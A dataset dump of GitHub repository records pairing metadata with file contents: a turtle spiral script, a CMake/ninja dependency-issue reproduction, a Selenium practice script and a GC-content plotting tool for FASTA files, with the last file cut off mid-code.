Schema:

repo_name: string (length 5–114)
repo_url: string (length 24–133)
snapshot_id: string (length 40)
revision_id: string (length 40)
directory_id: string (length 40)
branch_name: string (209 distinct values)
visit_date: timestamp[ns]
revision_date: timestamp[ns]
committer_date: timestamp[ns]
github_id: int64 (9.83k–683M)
star_events_count: int64 (0–22.6k)
fork_events_count: int64 (0–4.15k)
gha_license_id: string (17 distinct values)
gha_created_at: timestamp[ns]
gha_updated_at: timestamp[ns]
gha_pushed_at: timestamp[ns]
gha_language: string (115 distinct values)
files: list (length 1–13.2k)
num_files: int64 (1–13.2k)
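The column types above follow Hugging Face `datasets` conventions (string/int64/timestamp dtypes with min–max statistics). As a minimal sketch of loading and inspecting records with this schema — assuming the rows below come from a dataset published on the Hub, where `"org/repo-snapshots"` is a hypothetical placeholder id — one could do:

```python
from datasets import load_dataset

# "org/repo-snapshots" is a hypothetical hub id -- substitute the real one.
# Streaming avoids downloading the full dataset up front.
ds = load_dataset("org/repo-snapshots", split="train", streaming=True)

for record in ds.take(3):
    # Scalar metadata columns from the schema above.
    print(record["repo_name"], record["branch_name"], record["num_files"])
    # `files` is a list of per-file metadata dicts (see the records below).
    for f in record["files"]:
        print("  ", f["path"], f["language"], f["length_bytes"])
```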

repo_name: hoshen20-meet/meet2018y1lab6
repo_url: https://github.com/hoshen20-meet/meet2018y1lab6
snapshot_id: 578f642a830ed37c9389a02d86fd5bebb6c3a644
revision_id: 68e70de443eba980b1de8b865eea8337aa82e6d3
directory_id: 51c892c9923ff3ae248c214dd9212a7a7bab2afe
branch_name: refs/heads/master
visit_date: 2020-03-22T13:39:17.688880
revision_date: 2018-08-05T13:28:07
committer_date: 2018-08-05T13:28:07
github_id: 140122690
star_events_count: 0
fork_events_count: 0
gha_license_id: MIT
gha_created_at: 2018-07-07T23:08:23
gha_updated_at: 2018-06-23T22:49:01
gha_pushed_at: 2018-06-23T22:48:59
gha_language: null
files:
[ { "alpha_fraction": 0.5487805008888245, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 16.69230842590332, "blob_id": "9939c5775d063d8d6858c02f6a629c39b12b4092", "content_id": "7c09a71db0078b990ab4cd62837f31b1190d482a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 41, "num_lines": 13, "path": "/spiral.py", "repo_name": "hoshen20-meet/meet2018y1lab6", "src_encoding": "UTF-8", "text": "import turtle\n\ncolors = ['green','blue','orange', 'red']\n\n\nturtle.speed(900)\nfor i in range(99999999):\n turtle.pencolor(colors[i%4])\n turtle.bgcolor('black')\n turtle.forward(i)\n turtle.degrees()\n\n turtle.right(421)\n \n \n \n\n" } ]
num_files: 1
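Each entry in `files` carries per-blob statistics (`alpha_fraction`, `avg_line_length`, `detected_licenses`, the raw `text`, and so on). As a small sketch of working with that list — assuming `record` is one parsed row, as in the loader above — one might aggregate per-file statistics like this:

```python
from collections import Counter

def summarize_files(record):
    """Tally files per language and total source size for one record."""
    by_language = Counter(f["language"] for f in record["files"])
    total_bytes = sum(f["length_bytes"] for f in record["files"])
    return by_language, total_bytes

# For the single-file record above: (Counter({"Python": 1}), 246).
```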

repo_name: AndiDog/cmake-depend-on-file-issue
repo_url: https://github.com/AndiDog/cmake-depend-on-file-issue
snapshot_id: c8f8a0b2de1b4a12b81b538ca2a948d367df1f3b
revision_id: e029d5bafb7e9382cbebca7118dc3f82949682c5
directory_id: 8fef778eb5d10405be3389583fbd1f216503125e
branch_name: refs/heads/master
visit_date: 2021-07-15T06:01:26.988313
revision_date: 2017-10-21T21:42:59
committer_date: 2017-10-21T21:56:12
github_id: 107817825
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6635730862617493, "alphanum_fraction": 0.6774942278862, "avg_line_length": 27.733333587646484, "blob_id": "a0d4f2a2d0dbad1ed914a356a38aa3e8be6b6bbc", "content_id": "73868056d8626ccb5e60daaed56286cbbbe10bd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 431, "license_type": "no_license", "max_line_length": 56, "num_lines": 15, "path": "/run_into_issue.sh", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n[ -e mysubdir ] || { >&2 echo Wrong directory; exit 1; }\nrm -rf .build\nmkdir .build\n(cd .build && cmake -GNinja .. && ninja)\nls -la mysubdir/common.py .build/mysubdir/M*\nsleep 62 # overlong breaks...\necho \"`date` TOUCH\"\ntouch mysubdir/common.py\nsleep 62 # ...to see the file times clearly\necho \"`date` BUILD AGAIN\"\n(cd .build && ninja)\nls -la mysubdir/common.py .build/mysubdir/M*\necho \"`date` FINISHED\"\n" }, { "alpha_fraction": 0.7835051417350769, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 31.33333396911621, "blob_id": "fec57773cee92bfe859ab7157bd7962ca4536f68", "content_id": "263e818403644ca6ba9a65d47355c7c6cc0039a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 97, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/CMakeLists.txt", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.9)\nproject(\"Depend on file example\")\nadd_subdirectory(mysubdir)\n" }, { "alpha_fraction": 0.6730901598930359, "alphanum_fraction": 0.7405368089675903, "avg_line_length": 44.40625, "blob_id": "79d9481d330c5dd4e9a7c88d549538a84b4c0fde", "content_id": "f103a4acf150e8f5fd9f21a6f45bec81aaa8f3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1453, "license_type": "no_license", "max_line_length": 125, "num_lines": 32, "path": "/README.md", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "Example output:\n\n```\n-- The C compiler identification is AppleClang 9.0.0.9000038\n-- The CXX compiler identification is AppleClang 9.0.0.9000038\n-- Check for working C compiler: /usr/local/opt/ccache/libexec/cc\n-- Check for working C compiler: /usr/local/opt/ccache/libexec/cc -- works\n-- Detecting C compiler ABI info\n-- Detecting C compiler ABI info - done\n-- Detecting C compile features\n-- Detecting C compile features - done\n-- Check for working CXX compiler: /usr/local/opt/ccache/libexec/c++\n-- Check for working CXX compiler: /usr/local/opt/ccache/libexec/c++ -- works\n-- Detecting CXX compiler ABI info\n-- Detecting CXX compiler ABI info - done\n-- Detecting CXX compile features\n-- Detecting CXX compile features - done\n-- Configuring done\n-- Generating done\n-- Build files have been written to: /Users/asommer/dev/extern/cmake-depend-on-file-issue/.build\n[2/2] Linking CXX executable mysubdir/MyExe\n-rwxr-xr-x 1 asommer wheel 4248 Oct 21 23:47 .build/mysubdir/MyExe\n-rw-r--r-- 1 asommer wheel 24 Oct 21 23:43 mysubdir/common.py\nSat Oct 21 23:48:20 CEST 2017 TOUCH\nSat Oct 21 23:49:22 CEST 2017 BUILD AGAIN\nninja: no work to do.\n-rwxr-xr-x 1 asommer wheel 4248 Oct 21 23:47 .build/mysubdir/MyExe\n-rw-r--r-- 1 asommer wheel 24 Oct 21 23:48 mysubdir/common.py\nSat Oct 21 23:49:22 CEST 2017 FINISHED\n```\n\nSee how ninja does not see any work on second build, even though \"common.py\" is 
newer than \"MyExe\" which should depend on it.\n" }, { "alpha_fraction": 0.7947019934654236, "alphanum_fraction": 0.7947019934654236, "avg_line_length": 36.75, "blob_id": "0ef72fc6bbffe78c9d7cc63b70ca36fb0538565c", "content_id": "eafdc104a54f8b44e47b92345df210ec0f0e795d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 151, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/mysubdir/CMakeLists.txt", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "add_custom_target(common_source DEPENDS \"${CMAKE_CURRENT_SOURCE_DIR}/common.py\")\n\nadd_executable(MyExe main.cpp)\nadd_dependencies(MyExe common_source)\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 23, "blob_id": "e23ffc4a2cc7b9e7f8cb2399187aafec87b9ffc9", "content_id": "b0ef15b52b3c0af873e4840e34207ea6fae3fe96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": "/mysubdir/common.py", "repo_name": "AndiDog/cmake-depend-on-file-issue", "src_encoding": "UTF-8", "text": "CONTENT DOES NOT MATTER\n" } ]
num_files: 5

repo_name: kunallray/jenkins_test
repo_url: https://github.com/kunallray/jenkins_test
snapshot_id: e95963f51e590c5840be04072e178a94df8ba7b7
revision_id: b8a1389d3ce51f37e805a31ba1cbb5e8032fad44
directory_id: 16d32415679d237ca2b6fe9d227e024a4e200b7a
branch_name: refs/heads/master
visit_date: 2022-11-18T19:30:10.729473
revision_date: 2020-07-17T22:41:10
committer_date: 2020-07-17T22:41:10
github_id: 280538399
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5756097435951233, "alphanum_fraction": 0.6048780679702759, "avg_line_length": 14.769230842590332, "blob_id": "4384c4a79a3e66483d23c58cd50027c8d7379891", "content_id": "2101b7d7b9501dc9ba1570d126209f2601e5c0de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/demo.py", "repo_name": "kunallray/jenkins_test", "src_encoding": "UTF-8", "text": "class person:\n def display(self):\n print(\"i am a person\")\n\n def greet(self):\n print(\"hello, how are you doing\")\n\np1=person()\np2=person()\np1.display()\np1.greet()\np2.display()\np2.greet()\n" }, { "alpha_fraction": 0.7942973375320435, "alphanum_fraction": 0.7942973375320435, "avg_line_length": 34.07143020629883, "blob_id": "2899ecb319525016df1ff24c3c3c9f6932e8e44b", "content_id": "dc0d7cb1370736db6b2c03e4ed65058c1a0ba21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 80, "num_lines": 14, "path": "/sample_oops.py", "repo_name": "kunallray/jenkins_test", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndriver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\")\n\ndriver.get(\"https://chercher.tech/practice/practice-pop-ups-selenium-webdriver\")\n\naction=ActionChains(driver)\naction.double_click(driver.find_element_by_id(\"double-click\")).perform()\n\nalert=driver.switch_to.alert\nassert \"You double clicked me!!!, You got to be kidding me\"==alert.text\nalert.accept()\n" } ]
num_files: 2

repo_name: leli-li/GC-content
repo_url: https://github.com/leli-li/GC-content
snapshot_id: c50ea8832f3d74af7f3737152b62e26144205a17
revision_id: 7731502b69ec4691cfb60e07998a2fe9bd28b139
directory_id: 6ddfce1b33799f761c3f0783f9040333b4ebff79
branch_name: refs/heads/main
visit_date: 2023-03-21T17:30:14.667261
revision_date: 2021-03-20T10:14:52
committer_date: 2021-03-20T10:14:52
github_id: 349678192
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6869741082191467, "alphanum_fraction": 0.7071692943572998, "avg_line_length": 40.22222137451172, "blob_id": "a9b14b30cca22fff3b446588a335abd1cbdf54e7", "content_id": "b8e6b8e72b07ea87b3d26739593775f622758155", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2971, "license_type": "no_license", "max_line_length": 197, "num_lines": 72, "path": "/README.md", "repo_name": "leli-li/GC-content", "src_encoding": "UTF-8", "text": "# Introduction\n\n### This program is a tool that uses sliding window to calculate GC content and plot graphs.\n### The software first reads the sequence from the fasta file, then merges the sequences, and calculates the GC content of each window according to the sliding window and step size set by the user.\n\n### Calculating GC content: (G+C)/(A+T+G+C)\n\n# Input file\n### The input file should be fasta format. The file can contain one or more sequences.\n\n\n# Program function\n## Single file processing :\n### combine sequences in fasta file and plot GC content through this large sequence. The output is a line chart.\n### plot distribution histogram based on each sequence in fasta file. The output is a histogram.\n### filter sequence using a range of GC content. The output is a new fasta file.\n\n## pairwise comparison : \n### Input two files and plot two lines of GC conteng in one graph. The output is one line chart. \n\n## File batch processing :\n### Input more than one fasta files and do single file processing on each file. The number of output line charts is the same as the number of input files.\n### The input files and this script should be put in the same directory without other files.\n\n## Batch pairwise comparison :\n### Input more than two fasta files and pairwise comparison on these files. If the number of input files is n, the number of output files should be [n*(n-1)]/2.\n### The input files and this script should be put in the same directory without other files.\n\n## all lines plotted in one graph :\n### Plot all lines in one line chart. The output is one graph.\n### The input files and this script should be put in the same directory without other files.\n\n\n# Usage\npython gc_content.py [-h] [-f FILE [FILE ...]] [-w WINDOW] [-s STEP]\n [-r Lower limit upper limit]\n {s,c,b,bc,a}\n\n## required arguments:\n### This parameter can only choose one from {s,c,b,bc,a}\n### single(s)\n### pairwise comparison(c)\n### batch single file processing(b)\n### batch pairwise comparison(bc) \n### all lines plotted in one graph(a)\n\n## optional arguments:\n### -h, --help show this help message and exit\n### -f FILE [FILE ...] --file FILE [FILE ...] : input file\n### \t\t\tfile name should be the whole name (with suffix)\n### -w WINDOW, --window WINDOW : set the size of sliding window\n### -s STEP, --step STEP : step size\n### -r Lower limit upper limit, --range Lower limit upper limit : set the range of GC content to filter sequences. 
between 0 and 100\n\n# example\n### single file:\npython gc_content.py s -f input_file -w 100000 -s 1000\n### fileter sequence:\npython gc_content.py s -f input_file -r 10 30\n\n\n### pairwise comparison:\npython gc_content.py c -f input_file1 input_file2 -w 10000 -s 100\n\n### batch single file processing:\npython gc_content.py b -w 100000 -s 1000\n\n### batch pairwise comparison:\npython gc_content.py bc -w 100000 -s 1000\n\n### plot all lines in one graph:\npython gc_content.py a -w 100000 -s 1000\n\n\n\n" }, { "alpha_fraction": 0.5978512763977051, "alphanum_fraction": 0.6126236319541931, "avg_line_length": 44.17481231689453, "blob_id": "ade3bae9695f28f7dd3e00a09ad8a83ce5d26b2a", "content_id": "e5f7e7f08ca0a0288dc5b30efe5986bc96d1f6cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24573, "license_type": "no_license", "max_line_length": 232, "num_lines": 532, "path": "/gc_content.py", "repo_name": "leli-li/GC-content", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis program is a tool to plot GC content\r\n@author: lily\r\n\"\"\"\r\n\r\n#import standard modules\r\nimport sys\r\nimport os\r\nimport argparse\r\n\r\n#import non-standard modules\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\n\r\n#check if the non-standard modules are installed\r\ntry:\r\n import matplotlib\r\nexcept ModuleNotFoundError:\r\n print('No module named matplotlib'+'\\n'+'please install it')\r\n sys.exit()\r\n\r\n\r\n# create the parser\r\n\r\ngc_parser = argparse.ArgumentParser(description='A tool for plotting GC content based on sliding window')\r\n\r\n#add position argument: mode argument\r\n#this program has five modes of processing files\r\ngc_parser.add_argument('mode',help='choose mode of program: single(s), pairwise comparison(c), batch processing(b), batch pairwise comparison(bc) and all lines in one plot(a)', choices=[\"s\",\"c\",\"b\",\"bc\",\"a\"],nargs=1,type=str)\r\n\r\n#add other arguments\r\ngc_parser.add_argument(\"-f\",\"--file\", help=\"input file\", nargs=\"+\", type=str) #\r\ngc_parser.add_argument(\"-w\",\"--window\", help=\"set the size of sliding window\", nargs=1, type=int)\r\ngc_parser.add_argument(\"-s\",\"--step\", help=\"set the step\", nargs=1, type=int)\r\ngc_parser.add_argument(\"-r\",\"--range\",metavar=(\"Lower limit\",\"upper limit\"),help=\"set the range of GC content to filter sequences. between 0 and 100\", nargs=2, type=int)\r\n# Execute the parse_args() method\r\nargs = gc_parser.parse_args()\r\n\r\n\r\ndef file_processing():\r\n#this function is to store the id and corresponding sequence into a dictionary\r\n#this dictionary is used to plot the distribution of gc content of each sequence \r\n#and used to filter sequences by a range of gc content \r\n#also combine sequences to a whole one. 
this is used to plot gc content through the whole sequence(usually the genome)\r\n global seq_dict #make variables to be used in the whole program\r\n global f_basename\r\n global whole_seq\r\n f = open(file,\"r\") \r\n f_basename=file.split(\".\")[0] #extract file name without suffix\r\n seq_dict={} #the dictionary of id and corresponding sequence\r\n for line in f: #combine the sequence if the sequence occupies more than one line\r\n if \">\" in line:\r\n seq_id = line.split(\" \")[0]\r\n seq_id = seq_id.strip()\r\n seq_id = seq_id.strip(\">\")\r\n seq = \"\" \r\n if \">\" not in line:\r\n line=line.strip()\r\n line=line.strip(\"-\")\r\n line=line.strip(\"-\")\r\n seq=seq+line \r\n seq_dict[seq_id]=seq #key is the id and value is the sequence\r\n#print some information to tell the user about running process\r\n print(\"\\n\" + \"File:\" + f_basename+\"\\n\") \r\n print(\"Number of sequences:\"+ str(len(seq_dict))+\"\\n\")\r\n#combine sequence to a whole sequence \r\n#it is used to plot GC content through the whole sequence(usually the genome) \r\n whole_seq=\"\"\r\n for seq in seq_dict.values():\r\n whole_seq=whole_seq+seq\r\n whole_seq=whole_seq.upper()\r\n print(\"Total length:\"+ str(len(whole_seq))) \r\n\r\ndef GC_content_distribution():\r\n#this function is to calculate GC content of each sequence and plot histogram:\r\n seq_gc=[] #store GC contents of each sequence \r\n for id in seq_dict:\r\n numerator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C') #when calculating GC content, convert letters to uppercase letters\r\n denominator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')+seq_dict[id].upper().count('A')+seq_dict[id].upper().count('T')\r\n if denominator!=0:\r\n ratio = numerator/denominator\r\n seq_gc.append(ratio)\r\n if denominator==0: #consider the situation of there's no stand nucleotides in a sequence\r\n ratio = 0\r\n seq_gc.append(0)\r\n fig = plt.figure(figsize=(15,10),dpi=300) #set the size of graph , it is only a blank graph\r\n ax = fig.add_subplot(1, 1, 1) #only add one figure\r\n ax.hist(seq_gc, bins=10, histtype='bar',color='steelblue') #plot\r\n plt.xlim(0,1) #set the range of x axis\r\n plt.xlabel('GC content',fontsize = 20) #add the labels of axis\r\n plt.ylabel('Counts of sequences',fontsize = 20)\r\n plt.tick_params(labelsize=15) #set the size of valus in axis\r\n plt.title(f_basename , fontsize=30,fontweight=\"heavy\") #set the title of graph\r\n plt.savefig(f_basename+\"_fre.png\") #save graph , the name is based on input file name\r\n\r\n\r\n\r\ndef calculate_GC():\r\n#this function is to calculate GC content based on sliding window\r\n global window_size #make variables to be used in the whole program\r\n global step\r\n global window\r\n global remainder\r\n global middle_p\r\n global interval\r\n global gc_list\r\n global stop_list\r\n global remainder_gc\r\n window_size = int(args.window[0]) #retrieve the window size from command\r\n step = int(args.step[0])\r\n #set the value of interval of x axis\r\n interval = str(int(len(whole_seq)/6))\r\n inter_list=list(interval)\r\n for i in range(1,len(inter_list)): #make the other digits are zero except the first one, so that the value in x axis are the numbers ending with zero\r\n inter_list[i]=\"0\"\r\n interval=int(\"\".join(inter_list)) \r\n seq_length = len(whole_seq)\r\n window={}\r\n remainder=[] \r\n stop_list=[]\r\n middle_p=[] \r\n start_list=[]\r\n if step != 0: #consider different situations of step value\r\n for start_index in range(0,seq_length,step): #the step 
decides the start position of a sliding window ,and the window size decides the length ,that is the stop position of a sliding window\r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n start_list.append(start_index)\r\n if step ==0:\r\n for start_index in range(0,seq_length,window_size): \r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n #deal with the remainder part in a sequence: \r\n if step != 0:\r\n if stop_list[-1] < seq_length -1: \r\n for a in range(start_list[-1]+step, seq_length):\r\n remainder.append(a)\r\n if step == 0:\r\n if stop_list[-1] < seq_length -1 :\r\n for a in range(int(stop_list[-1])+1, seq_length):\r\n remainder.append(a)\r\n#generate the values in x axis, which is the middle position of a window\r\n#the index should plus 1 because python index starts with 0, but in real sequence index starts with 1\r\n for index in window.keys():\r\n middle = ((index+1)+(window[index]+1))/2 \r\n middle_p.append(middle) \r\n if len(remainder)>0:\r\n remainder_middle=((remainder[0]+1)+(remainder[-1]+1))/2\r\n middle_p.append(remainder_middle) \r\n#calculate_gc_content: \r\n gc_list = [] #this list is the y axis \r\n for a,b in zip (list(window.keys()),list(window.values())):\r\n segment=whole_seq[a:(b+1)]\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) !=0:\r\n gc=(segment.count(\"G\")+segment.count(\"C\")) / (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\"))\r\n gc_list.append(gc)\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) ==0:\r\n gc_list.append(0)\r\n if len(remainder)>0:\r\n remainder_segment = whole_seq[remainder[0]:]\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) !=0:\r\n remainder_gc = (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")) / (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) \r\n gc_list.append(remainder_gc)\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) ==0:\r\n gc_list.append(0)\r\n\r\ndef single_line_chart():\r\n#plot of one single file \r\n#generate a baseline of mean value\r\n#calculate mean value of sliding windows\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list) \r\n x = middle_p\r\n y = gc_list\r\n fig = plt.figure(figsize=(20,10),dpi=300) #set a blank figure\r\n ax = fig.add_subplot(1, 1, 1) # add one plot\r\n ax.plot(x,y,label=f_basename,linewidth=2.3) #plot the line of GC content\r\n ax.xaxis.set_major_locator(ticker.MultipleLocator(interval)) #set the values displayed of x axis\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n #plot a straight line of mean value\r\n a = [0,len(whole_seq)] \r\n b = [mean_gc,mean_gc]\r\n ax.plot(a,b,label=\"mean=\"+str(round(mean_gc,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n plt.title(f_basename,fontsize=30,fontweight=\"heavy\") #set the title\r\n plt.xlabel('Position',fontsize = 20) #set the label of axis\r\n plt.ylabel('GC content',fontsize = 20)\r\n plt.ylim(min(gc_list)-0.1,max(gc_list)+0.1)\r\n 
plt.tick_params(labelsize=15) #set the size of numbers of axis\r\n plt.legend(ncol=1,fontsize=15,loc=\"upper right\") #set the size of legend and make it show in one column\r\n plt.text(len(whole_seq)/2,min(gc_list)-0.1+0.02,s=\"window size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\") #add the text of window size and step\r\n plt.savefig(f_basename+\"_line.png\") #save the graph\r\n\r\n\r\n\r\ndef sequence_filter():\r\n#this function is to filter sequence of a specific range \r\n#get the range from the arguments in command\r\n lower_limit=float(args.range[0])\r\n upper_limit=float(args.range[1])\r\n#calculate GC content of each sequence and write to file\r\n out=open(f_basename+\"_filter.out\",\"w\")\r\n for id in seq_dict:\r\n numerator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')\r\n denominator=seq_dict[id].upper().count('G')+seq_dict[id].upper().count('C')+seq_dict[id].upper().count('A')+seq_dict[id].upper().count('T')\r\n if denominator!=0:\r\n ratio = round(numerator/denominator,2)\r\n if lower_limit <= ratio *100 <= upper_limit:\r\n out.write(\">\"+id+\"\\t\"+\"GC=\"+str((ratio))+\"\\n\"+seq_dict[id]+\"\\n\")\r\n if denominator==0:\r\n ratio = 0\r\n if lower_limit <= ratio * 100 <= upper_limit:\r\n out.write(\">\"+id+\"\\t\"+\"GC=\"+str((ratio))+\"\\n\"+seq_dict[id]+\"\\n\")\r\n out.close() \r\n\r\n\r\ndef another_file_processing():\r\n#this function is used in pairwise comparison\r\n#it is used to process another file\r\n global seq_dict2\r\n global f_basename2\r\n global whole_seq2\r\n f = open(file2,\"r\") \r\n f_basename2=file2.split(\".\")[0]\r\n seq_dict2={}\r\n for line in f: #combine the sequence if the sequence occupies more than one line\r\n if \">\" in line:\r\n seq_id = line.split(\" \")[0]\r\n seq_id = seq_id.strip()\r\n seq_id = seq_id.strip(\">\")\r\n seq = \"\" \r\n if \">\" not in line:\r\n line=line.strip()\r\n line=line.upper()\r\n seq=seq+line\r\n seq_dict2[seq_id]=seq \r\n#print some information to tell the user about running process\r\n print(\"\\n\" + \"File2:\" + f_basename2+\"\\n\")\r\n print(\"Number of sequences:\"+ str(len(seq_dict2))+\"\\n\")\r\n f.close()\r\n#combine sequence to a whole sequence \r\n whole_seq2=\"\"\r\n for seq in seq_dict2.values():\r\n whole_seq2=whole_seq2+seq\r\n whole_seq2=whole_seq2.upper()\r\n print(\"Total length:\"+ str(len(whole_seq2)))\r\n\r\n\r\ndef another_GC_and_comparison_plot():\r\n#this function is used in pairwise comparison\r\n#calculate GC_content of file2 and plot line charts of file1 and file2 in a same figure\r\n global window2\r\n global remainder2\r\n global middle_p2\r\n global interval2\r\n global gc_list2\r\n #calculate the interval of x axis\r\n interval2 = str(int(len(whole_seq2)/6))\r\n inter_list=list(interval2)\r\n for i in range(1,len(inter_list)): #make the other digits are zero except the first one, so that the value in x axis are the numbers ending with zero\r\n inter_list[i]=\"0\"\r\n interval2=int(\"\".join(inter_list)) \r\n seq_length = len(whole_seq2)\r\n window2={}\r\n remainder2=[] \r\n stop_list=[]\r\n middle_p2=[] \r\n start_list=[]\r\n if step != 0:\r\n for start_index in range(0,seq_length,step):\r\n stop_index = start_index + window_size -1\r\n if stop_index <= seq_length-1: \r\n window2[start_index] = stop_index\r\n stop_list.append(stop_index)\r\n start_list.append(start_index)\r\n if step ==0:\r\n for start_index in range(0,seq_length,window_size): \r\n stop_index = start_index + 
window_size -1\r\n if stop_index <= seq_length-1: \r\n window2[start_index] = stop_index\r\n stop_list.append(stop_index) \r\n#deal with the remainder part in sequence: \r\n if step != 0:\r\n if stop_list[-1] < seq_length -1 : \r\n for a in range(start_list[-1]+step, seq_length):\r\n remainder2.append(a)\r\n if step == 0:\r\n if stop_list[-1] < seq_length -1 :\r\n for a in range(int(stop_list[-1])+1, seq_length):\r\n remainder2.append(a)\r\n#generate the x axis, which is the middle position of a window\r\n#the index should plus 1 because python index starts with 0, but in real sequence index starts with 1\r\n for index in window2.keys():\r\n middle = ((index+1)+(window2[index]+1))/2 \r\n middle_p2.append(middle) \r\n if len(remainder2)>0:\r\n remainder_middle=((remainder2[0]+1)+(remainder2[-1]+1))/2\r\n middle_p2.append(remainder_middle) \r\n#calculate_gc_content: \r\n gc_list2 = []\r\n for a,b in zip (list(window2.keys()),list(window2.values())):\r\n segment=whole_seq2[a:(b+1)]\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) !=0:\r\n gc=(segment.count(\"G\")+segment.count(\"C\")) / (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\"))\r\n gc_list2.append(gc)\r\n if (segment.count(\"G\")+segment.count(\"C\")+segment.count(\"A\")+segment.count(\"T\")) ==0:\r\n gc_list2.append(0)\r\n if len(remainder2)>0:\r\n remainder_segment = whole_seq2[remainder2[0]:]\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) !=0:\r\n remainder_gc = (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")) / (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) \r\n gc_list2.append(remainder_gc)\r\n if (remainder_segment.count(\"G\")+remainder_segment.count(\"C\")+remainder_segment.count(\"A\")+remainder_segment.count(\"T\")) ==0:\r\n gc_list2.append(0)\r\n\r\n#calculate average GC content of genome1\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list)\r\n#calculate average GC content of genome2\r\n total_gc2=0\r\n for value in gc_list2:\r\n total_gc2=total_gc2+value\r\n mean_gc2=total_gc2/len(gc_list2)\r\n#generate a baseline: average GC content of the two mean values\r\n ave_gc=round((mean_gc+mean_gc2)/2,2) \r\n fig = plt.figure(figsize=(20,10),dpi=300)\r\n ax = fig.add_subplot(1, 1, 1)\r\n#plot the first genome \r\n x = middle_p\r\n y = gc_list \r\n ax.plot(x,y,label=f_basename+\":mean=\"+str(round(mean_gc,2)),linewidth=2.3) \r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n#plot the second genome \r\n x2 = middle_p2\r\n y2 = gc_list2 \r\n ax.plot(x2,y2,label=f_basename2+\":mean=\"+str(round(mean_gc2,2)),linewidth=2.3)\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n#plot the baseline\r\n a = [0,max(len(whole_seq),len(whole_seq2))]\r\n b = [ave_gc,ave_gc]\r\n ax.plot(a,b,label=\"mean=\"+str(round(ave_gc,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n#set the parameters of the plot\r\n 